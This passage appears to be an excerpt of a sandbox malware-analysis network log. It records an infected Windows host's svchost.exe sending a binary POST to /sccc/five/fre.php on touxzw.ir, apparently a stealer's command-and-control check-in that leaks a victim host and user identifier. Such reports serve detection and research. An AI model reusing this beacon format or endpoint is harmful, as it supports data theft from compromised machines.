                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:38.559964895 CET841INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iT0sYfpk1bLk7UjA7KyekZm5MXTgwsTbmBPqrpYKaUYHQkgzhiN67didNpyIzDUwYiNIGfyuWwvho1MmEe69xEf5U5SrfIO%2Bhcf%2BtkgMY4rWZzHriXZSgQL8eKE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27ea5e1f8c93-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=4099&min_rtt=4099&rtt_var=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.449958104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:39.717734098 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:39.722811937 CET149OUT